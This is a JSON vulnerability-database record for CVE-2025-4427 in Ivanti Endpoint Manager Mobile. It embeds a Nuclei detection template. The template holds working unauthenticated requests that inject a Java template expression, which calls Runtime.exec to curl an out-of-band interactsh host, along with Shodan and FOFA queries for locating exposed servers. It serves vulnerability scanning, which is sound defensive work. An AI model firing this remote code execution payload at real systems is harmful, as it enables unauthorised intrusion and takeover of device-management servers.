{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-4427/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-4427/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-4427/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-4427/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-4427/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-4427"},"sightings":{"href":"/api/v1/sightings/cve-2025-4427"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-4427.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-4427\n\ninfo:\n  name: Ivanti Endpoint Manager Mobile - Unauthenticated Remote Code Execution\n  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch\n  severity: critical\n  description: |\n    An authentication bypass in Ivanti Endpoint Manager Mobile allowing attackers to access protected resources without proper credentials. This leads to unauthenticated Remote Code Execution via unsafe userinput in one of the bean validators which is sink for Server-Side Template Injection.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code with elevated privileges through server-side template injection in bean validators, achieving complete system compromise.\n  remediation: |\n    Apply the security patches as described in the Ivanti security advisory for Endpoint Manager Mobile.\n  reference:\n    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2025-4427\n    cwe-id: CWE-288\n    epss-score: 0.99927\n    epss-percentile: 0.99968\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.favicon.hash:\"362091310\"\n    fofa-query: icon_hash=\"362091310\"\n    product: endpoint_manager_mobile\n    vendor: ivanti\n  tags: cve,cve2025,ivanti,epmm,rce,ssti,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        GET /api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d HTTP/1.1\n        Host: {{Hostname}}\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"localizedMessage\"\n\n      - type: regex\n        part: body\n        regex:\n          - \"Format 'Process\\\\[pid=\"\n          - \"Format 'java\\\\.lang\\\\.UNIXProcess@[0-9a-f]+'\"\n        condition: or\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - dns\n\n      - type: status\n        status:\n          - 400\n# digest: 4a0a00473045022005e8ca8a3f887287bc7930c14ec298ef8eab6d893a23b329352be7faea90c1d8022100c6947817211600e0b79781b9816217b7da1248346722ae638f21ad3e40ecb5c4:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2025-4427"}